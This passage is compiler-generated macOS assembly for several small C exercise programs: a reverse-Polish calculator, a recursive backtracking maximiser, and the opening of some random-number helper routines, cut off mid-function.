_push jmp LBB0_15 LBB0_14: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi movb $0, %al callq _printf LBB0_15: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_22 LBB0_16: ## in Loop: Header=BB0_1 Depth=1 callq _top leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf jmp LBB0_22 LBB0_17: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -136(%rbp) movsd -136(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _push movsd -136(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _push jmp LBB0_22 LBB0_18: ## in Loop: Header=BB0_1 Depth=1 callq _pop movsd %xmm0, -128(%rbp) callq _pop movsd %xmm0, -136(%rbp) movsd -128(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _push movsd -136(%rbp), %xmm0 ## xmm0 = mem[0],zero callq _push jmp LBB0_22 LBB0_19: ## in Loop: Header=BB0_1 Depth=1 callq _clear jmp LBB0_22 LBB0_20: ## in Loop: Header=BB0_1 Depth=1 callq _pop leaq L_.str.1(%rip), %rdi movb $1, %al callq _printf jmp LBB0_22 LBB0_21: ## in Loop: Header=BB0_1 Depth=1 leaq -112(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf LBB0_22: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_23: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_25 ## %bb.24: xorl %eax, %eax addq $160, %rsp popq %rbp retq LBB0_25: callq ___stack_chk_fail ud2 .cfi_endproc .p2align 2, 0x90 .data_region jt32 .set L0_0_set_20, LBB0_20-LJTI0_0 .set L0_0_set_21, LBB0_21-LJTI0_0 .set L0_0_set_19, LBB0_19-LJTI0_0 .set L0_0_set_17, LBB0_17-LJTI0_0 .set L0_0_set_12, LBB0_12-LJTI0_0 .set L0_0_set_6, LBB0_6-LJTI0_0 .set L0_0_set_5, LBB0_5-LJTI0_0 .set L0_0_set_7, LBB0_7-LJTI0_0 .set L0_0_set_8, LBB0_8-LJTI0_0 .set L0_0_set_3, LBB0_3-LJTI0_0 .set L0_0_set_4, LBB0_4-LJTI0_0 .set L0_0_set_16, LBB0_16-LJTI0_0 .set L0_0_set_18, LBB0_18-LJTI0_0 LJTI0_0: .long L0_0_set_20 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_19 .long L0_0_set_21 .long L0_0_set_17 .long L0_0_set_21 .long L0_0_set_12 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_6 .long L0_0_set_5 .long L0_0_set_21 .long L0_0_set_7 .long L0_0_set_21 .long L0_0_set_8 .long L0_0_set_3 .long L0_0_set_4 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_16 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_21 .long L0_0_set_18 .end_data_region ## -- End function .globl _getop ## -- Begin function getop .p2align 4, 0x90 _getop: ## @getop .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 callq _getch movl %eax, -24(%rbp) ## kill: def $al killed $al killed $eax movq -16(%rbp), %rcx movb %al, (%rcx) movsbl %al, %ecx movb $1, %al cmpl $32, %ecx movb %al, -25(%rbp) ## 1-byte Spill je LBB1_3 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 cmpl $9, -24(%rbp) sete %al movb %al, -25(%rbp) ## 1-byte Spill LBB1_3: ## in Loop: Header=BB1_1 Depth=1 movb -25(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_4 jmp LBB1_5 LBB1_4: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_1 LBB1_5: movq -16(%rbp), %rax movb $0, 1(%rax) movl $0, -20(%rbp) movl -24(%rbp), %edi callq _islower cmpl $0, %eax je LBB1_12 ## %bb.6: jmp LBB1_7 LBB1_7: ## =>This Inner Loop Header: Depth=1 callq _getch movl %eax, -24(%rbp) ## kill: def $al killed $al killed $eax movq -16(%rbp), %rcx movl -20(%rbp), %edx addl $1, %edx movl %edx, -20(%rbp) movslq %edx, %rdx movb %al, (%rcx,%rdx) movsbl %al, %edi callq _islower cmpl $0, %eax je LBB1_9 ## %bb.8: ## in Loop: Header=BB1_7 Depth=1 jmp LBB1_7 LBB1_9: movq -16(%rbp), %rax movslq -20(%rbp), %rcx movb $0, (%rax,%rcx) cmpl $-1, -24(%rbp) je LBB1_11 ## %bb.10: movl -24(%rbp), %edi callq _ungetch LBB1_11: movl $49, -4(%rbp) jmp LBB1_33 LBB1_12: movl -24(%rbp), %edi callq _isdigit cmpl $0, %eax jne LBB1_16 ## %bb.13: cmpl $46, -24(%rbp) je LBB1_16 ## %bb.14: cmpl $45, -24(%rbp) je LBB1_16 ## %bb.15: movl -24(%rbp), %eax movl %eax, -4(%rbp) jmp LBB1_33 LBB1_16: cmpl $45, -24(%rbp) jne LBB1_20 ## %bb.17: callq _getch movl %eax, -24(%rbp) ## kill: def $al killed $al killed $eax movq -16(%rbp), %rcx movl -20(%rbp), %edx addl $1, %edx movl %edx, -20(%rbp) movslq %edx, %rdx movb %al, (%rcx,%rdx) movsbl %al, %edi callq _isdigit cmpl $0, %eax jne LBB1_19 ## %bb.18: movl -24(%rbp), %edi callq _ungetch movl $45, -4(%rbp) jmp LBB1_33 LBB1_19: jmp LBB1_20 LBB1_20: movl -24(%rbp), %edi callq _isdigit cmpl $0, %eax je LBB1_25 ## %bb.21: jmp LBB1_22 LBB1_22: ## =>This Inner Loop Header: Depth=1 callq _getch movl %eax, -24(%rbp) ## kill: def $al killed $al killed $eax movq -16(%rbp), %rcx movl -20(%rbp), %edx addl $1, %edx movl %edx, -20(%rbp) movslq %edx, %rdx movb %al, (%rcx,%rdx) movsbl %al, %edi callq _isdigit cmpl $0, %eax je LBB1_24 ## %bb.23: ## in Loop: Header=BB1_22 Depth=1 jmp LBB1_22 LBB1_24: jmp LBB1_25 LBB1_25: cmpl $46, -24(%rbp) jne LBB1_30 ## %bb.26: jmp LBB1_27 LBB1_27: ## =>This Inner Loop Header: Depth=1 callq _getch movl %eax, -24(%rbp) ## kill: def $al killed $al killed $eax movq -16(%rbp), %rcx movl -20(%rbp), %edx addl $1, %edx movl %edx, -20(%rbp) movslq %edx, %rdx movb %al, (%rcx,%rdx) movsbl %al, %edi callq _isdigit cmpl $0, %eax je LBB1_29 ## %bb.28: ## in Loop: Header=BB1_27 Depth=1 jmp LBB1_27 LBB1_29: jmp LBB1_30 LBB1_30: movq -16(%rbp), %rax movslq -20(%rbp), %rcx movb $0, (%rax,%rcx) cmpl $-1, -24(%rbp) je LBB1_32 ## %bb.31: movl -24(%rbp), %edi callq _ungetch LBB1_32: movl $48, -4(%rbp) LBB1_33: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _push ## -- Begin function push .p2align 4, 0x90 _push: ## @push .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movsd %xmm0, -8(%rbp) cmpl $100, _sp(%rip) jge LBB2_2 ## %bb.1: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero movl _sp(%rip), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, _sp(%rip) movslq %eax, %rcx movq _val@GOTPCREL(%rip), %rax movsd %xmm0, (%rax,%rcx,8) jmp LBB2_3 LBB2_2: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero leaq L_.str.3(%rip), %rdi movb $1, %al callq _printf LBB2_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _func ## -- Begin function func .p2align 4, 0x90 _func: ## @func .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movq -8(%rbp), %rdi leaq L_.str.5(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_2 ## %bb.1: callq _pop callq _sin callq _push jmp LBB3_9 LBB3_2: movq -8(%rbp), %rdi leaq L_.str.6(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_4 ## %bb.3: callq _pop callq _exp callq _push jmp LBB3_8 LBB3_4: movq -8(%rbp), %rdi leaq L_.str.7(%rip), %rsi callq _strcmp cmpl $0, %eax jne LBB3_6 ## %bb.5: callq _pop movsd %xmm0, -16(%rbp) callq _pop movsd -16(%rbp), %xmm1 ## xmm1 = mem[0],zero callq _pow callq _push jmp LBB3_7 LBB3_6: movq -8(%rbp), %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf LBB3_7: jmp LBB3_8 LBB3_8: jmp LBB3_9 LBB3_9: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _pop ## -- Begin function pop .p2align 4, 0x90 _pop: ## @pop .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp cmpl $0, _sp(%rip) jle LBB4_2 ## %bb.1: movl _sp(%rip), %eax addl $-1, %eax movl %eax, _sp(%rip) movslq %eax, %rcx movq _val@GOTPCREL(%rip), %rax movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -8(%rbp) jmp LBB4_3 LBB4_2: leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf xorps %xmm0, %xmm0 movsd %xmm0, -8(%rbp) LBB4_3: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _top ## -- Begin function top .p2align 4, 0x90 _top: ## @top .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp cmpl $0, _sp(%rip) jle LBB5_2 ## %bb.1: movl _sp(%rip), %eax subl $1, %eax movslq %eax, %rcx movq _val@GOTPCREL(%rip), %rax movsd (%rax,%rcx,8), %xmm0 ## xmm0 = mem[0],zero movsd %xmm0, -8(%rbp) jmp LBB5_3 LBB5_2: leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf xorps %xmm0, %xmm0 movsd %xmm0, -8(%rbp) LBB5_3: movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _clear ## -- Begin function clear .p2align 4, 0x90 _clear: ## @clear .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl $0, _sp(%rip) popq %rbp retq .cfi_endproc ## -- End function .globl _getch ## -- Begin function getch .p2align 4, 0x90 _getch: ## @getch .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp cmpl $0, _bufp(%rip) jle LBB7_2 ## %bb.1: movl _bufp(%rip), %eax addl $-1, %eax movl %eax, _bufp(%rip) movslq %eax, %rcx movq _buf@GOTPCREL(%rip), %rax movsbl (%rax,%rcx), %eax movl %eax, -4(%rbp) ## 4-byte Spill jmp LBB7_3 LBB7_2: callq _getchar movl %eax, -4(%rbp) ## 4-byte Spill LBB7_3: movl -4(%rbp), %eax ## 4-byte Reload addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _ungetch ## -- Begin function ungetch .p2align 4, 0x90 _ungetch: ## @ungetch .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) cmpl $100, _bufp(%rip) jl LBB8_2 ## %bb.1: leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf jmp LBB8_3 LBB8_2: movl -4(%rbp), %eax movb %al, %dl movl _bufp(%rip), %eax movl %eax, %ecx addl $1, %ecx movl %ecx, _bufp(%rip) movslq %eax, %rcx movq _buf@GOTPCREL(%rip), %rax movb %dl, (%rax,%rcx) LBB8_3: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "error: zero divisor\n" L_.str.1: ## @.str.1 .asciz "\t%.8g\n" L_.str.2: ## @.str.2 .asciz "error: unknown command %s\n" .globl _sp ## @sp .zerofill __DATA,__common,_sp,4,2 .comm _val,800,4 ## @val L_.str.3: ## @.str.3 .asciz "error: stack full, can't push %g\n" L_.str.4: ## @.str.4 .asciz "error: stack empty\n" L_.str.5: ## @.str.5 .asciz "sin" L_.str.6: ## @.str.6 .asciz "exp" L_.str.7: ## @.str.7 .asciz "pow" .globl _bufp ## @bufp .zerofill __DATA,__common,_bufp,4,2 .comm _buf,100,4 ## @buf L_.str.8: ## @.str.8 .asciz "ungetch: too many characters\n" .subsections_via_symbols
the_stack_data/799508.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _max ; -- Begin function max .p2align 2 _max: ; @max .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #8] str w1, [sp, #4] ldr w8, [sp, #8] ldr w9, [sp, #4] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr w8, [sp, #8] str w8, [sp, #12] b LBB0_4 LBB0_2: ldr w8, [sp, #4] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: ldr w8, [sp, #4] str w8, [sp, #12] b LBB0_4 LBB0_4: ldr w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _backtracking ; -- Begin function backtracking .p2align 2 _backtracking: ; @backtracking .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _matriz@GOTPAGE ldr x8, [x8, _matriz@GOTPAGEOFF] add x8, x8, #40 str x8, [sp, #8] ; 8-byte Folded Spill stur w0, [x29, #-8] stur w1, [x29, #-12] str w2, [sp, #16] ldr w8, [sp, #16] subs w8, w8, #0 cset w8, ge tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: stur wzr, [x29, #-4] b LBB1_7 LBB1_2: ldur w8, [x29, #-8] adrp x9, _tam@GOTPAGE ldr x9, [x9, _tam@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_6 b LBB1_3 LBB1_3: ldur w8, [x29, #-12] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: ldur w8, [x29, #-12] stur w8, [x29, #-4] b LBB1_7 LBB1_5: stur wzr, [x29, #-4] b LBB1_7 LBB1_6: ldr x9, [sp, #8] ; 8-byte Folded Reload ldur w8, [x29, #-8] add w0, w8, #1 ldur w8, [x29, #-12] ldursw x11, [x29, #-8] adrp x10, _matriz@GOTPAGE ldr x10, [x10, _matriz@GOTPAGEOFF] ldr w10, [x10, x11, lsl #2] add w1, w8, w10 ldr w8, [sp, #16] ldursw x10, [x29, #-8] ldr w9, [x9, x10, lsl #2] subs w2, w8, w9 bl _backtracking str w0, [sp, #4] ; 4-byte Folded Spill ldur w8, [x29, #-8] add w0, w8, #1 ldur w1, [x29, #-12] ldr w2, [sp, #16] bl _backtracking mov x1, x0 ldr w0, [sp, #4] ; 4-byte Folded Reload bl _max stur w0, [x29, #-4] b LBB1_7 LBB1_7: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x9, sp adrp x8, _tam@GOTPAGE ldr x8, [x8, _tam@GOTPAGEOFF] str x8, [x9] sub x8, x29, #12 str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf stur wzr, [x29, #-4] b LBB2_1 LBB2_1: ; =>This Loop Header: Depth=1 ; Child Loop BB2_3 Depth 2 ldur w8, [x29, #-4] subs w8, w8, #2 cset w8, ge tbnz w8, #0, LBB2_8 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 stur wzr, [x29, #-8] b LBB2_3 LBB2_3: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-8] adrp x9, _tam@GOTPAGE ldr x9, [x9, _tam@GOTPAGEOFF] ldr w9, [x9] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB2_6 b LBB2_4 LBB2_4: ; in Loop: Header=BB2_3 Depth=2 ldursw x8, [x29, #-4] mov x9, #40 mul x9, x8, x9 adrp x8, _matriz@GOTPAGE ldr x8, [x8, _matriz@GOTPAGEOFF] add x8, x8, x9 ldursw x9, [x29, #-8] add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf b LBB2_5 LBB2_5: ; in Loop: Header=BB2_3 Depth=2 ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] b LBB2_3 LBB2_6: ; in Loop: Header=BB2_1 Depth=1 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_1 Depth=1 ldur w8, [x29, #-4] add w8, w8, #1 stur w8, [x29, #-4] b LBB2_1 LBB2_8: ldur w2, [x29, #-12] mov w1, #0 mov x0, x1 bl _backtracking mov x9, sp ; implicit-def: $x8 mov x8, x0 str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .comm _tam,4,2 ; @tam .comm _matriz,80,2 ; @matriz .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d\n" l_.str.1: ; @.str.1 .asciz "%d" l_.str.2: ; @.str.2 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _max ## -- Begin function max .p2align 4, 0x90 _max: ## @max .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -8(%rbp) movl %esi, -12(%rbp) movl -8(%rbp), %eax cmpl -12(%rbp), %eax jle LBB0_2 ## %bb.1: movl -8(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_4 LBB0_2: movl -12(%rbp), %eax cmpl -8(%rbp), %eax jl LBB0_4 ## %bb.3: movl -12(%rbp), %eax movl %eax, -4(%rbp) LBB0_4: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _backtracking ## -- Begin function backtracking .p2align 4, 0x90 _backtracking: ## @backtracking .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -8(%rbp) movl %esi, -12(%rbp) movl %edx, -16(%rbp) cmpl $0, -16(%rbp) jge LBB1_2 ## %bb.1: movl $0, -4(%rbp) jmp LBB1_7 LBB1_2: movl -8(%rbp), %eax movq _tam@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB1_6 ## %bb.3: cmpl $0, -12(%rbp) je LBB1_5 ## %bb.4: movl -12(%rbp), %eax movl %eax, -4(%rbp) jmp LBB1_7 LBB1_5: movl $0, -4(%rbp) jmp LBB1_7 LBB1_6: movl -8(%rbp), %edi addl $1, %edi movl -12(%rbp), %esi movslq -8(%rbp), %rcx movq _matriz@GOTPCREL(%rip), %rax addl (%rax,%rcx,4), %esi movl -16(%rbp), %edx movslq -8(%rbp), %rcx movq _matriz@GOTPCREL(%rip), %rax subl 40(%rax,%rcx,4), %edx callq _backtracking movl %eax, -20(%rbp) ## 4-byte Spill movl -8(%rbp), %edi addl $1, %edi movl -12(%rbp), %esi movl -16(%rbp), %edx callq _backtracking movl -20(%rbp), %edi ## 4-byte Reload movl %eax, %esi callq _max movl %eax, -4(%rbp) LBB1_7: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp leaq L_.str(%rip), %rdi movq _tam@GOTPCREL(%rip), %rsi leaq -12(%rbp), %rdx movb $0, %al callq _scanf movl $0, -4(%rbp) LBB2_1: ## =>This Loop Header: Depth=1 ## Child Loop BB2_3 Depth 2 cmpl $2, -4(%rbp) jge LBB2_8 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 movl $0, -8(%rbp) LBB2_3: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -8(%rbp), %eax movq _tam@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_6 ## %bb.4: ## in Loop: Header=BB2_3 Depth=2 movslq -4(%rbp), %rax movq _matriz@GOTPCREL(%rip), %rsi imulq $40, %rax, %rax addq %rax, %rsi movslq -8(%rbp), %rax shlq $2, %rax addq %rax, %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf ## %bb.5: ## in Loop: Header=BB2_3 Depth=2 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB2_3 LBB2_6: ## in Loop: Header=BB2_1 Depth=1 jmp LBB2_7 LBB2_7: ## in Loop: Header=BB2_1 Depth=1 movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) jmp LBB2_1 LBB2_8: movl -12(%rbp), %edx xorl %esi, %esi movl %esi, %edi callq _backtracking movl %eax, %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _tam,4,2 ## @tam .comm _matriz,80,4 ## @matriz .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d\n" L_.str.1: ## @.str.1 .asciz "%d" L_.str.2: ## @.str.2 .asciz "%d\n" .subsections_via_symbols
the_stack_data/90763347.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _lga_ssqrt ; -- Begin function lga_ssqrt .p2align 2 _lga_ssqrt: ; @lga_ssqrt .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str s0, [sp, #8] ldr s0, [sp, #8] fcmp s0, #0.0 cset w8, pl tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr s0, [sp, #8] fneg s0, s0 fcvt d0, s0 fsqrt d0, d0 fneg d0, d0 fcvt s0, d0 str s0, [sp, #12] b LBB0_3 LBB0_2: ldr s0, [sp, #8] fcvt d0, s0 fsqrt d0, d0 fcvt s0, d0 str s0, [sp, #12] b LBB0_3 LBB0_3: ldr s0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _lga_nfrand ; -- Begin function lga_nfrand .p2align 2 _lga_nfrand: ; @lga_nfrand .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _rand scvtf s0, w0 movi.2s v1, #79, lsl #24 ; kill: def $s1 killed $s1 killed $d1 fdiv s0, s0, s1 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function lga_sfrand lCPI2_0: .quad 0x41cfffffffc00000 ; double 1073741823.5 .section __TEXT,__text,regular,pure_instructions .globl _lga_sfrand .p2align 2 _lga_sfrand: ; @lga_sfrand .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _rand scvtf d0, w0 adrp x8, lCPI2_0@PAGE ldr d1, [x8, lCPI2_0@PAGEOFF] fdiv d0, d0, d1 fmov d1, #1.00000000 fsub d0, d0, d1 fcvt s0, d0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function lga_sqrrand lCPI3_0: .quad 0x4070000000000000 ; double 256 .section __TEXT,__text,regular,pure_instructions .globl _lga_sqrrand .p2align 2 _lga_sqrrand: ; @lga_sqrrand .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _lga_nfrand mov w8, #1199570944 fmov s1, w8 fmul s0, s0, s1 fcvt d0, s0 fsqrt d0, d0 adrp x8, lCPI3_0@PAGE ldr d1, [x8, lCPI3_0@PAGEOFF] fdiv d0, d0, d1 fcvt s0, d0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _lga_ssqrrand ; -- Begin function lga_ssqrrand .p2align 2 _lga_ssqrrand: ; @lga_ssqrrand .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _lga_sfrand mov w8, #1199570944 fmov s1, w8 fmul s0, s0, s1 bl _lga_ssqrt mov w8, #1132462080 fmov s1, w8 fdiv s0, s0, s1 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _lga_logrand ; -- Begin function lga_logrand .p2align 2 _lga_logrand: ; @lga_logrand .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _lga_nfrand fmov s2, #1.00000000 mov w8, #65280 movk w8, #18303, lsl #16 fmov s1, w8 fmadd s0, s0, s1, s2 fcvt d0, s0 bl _log2 fmov d1, #16.00000000 fdiv d0, d0, d1 fcvt s0, d0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .globl _lga_malloc ; -- Begin function lga_malloc .p2align 2 _lga_malloc: ; @lga_malloc .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-12] ldursw 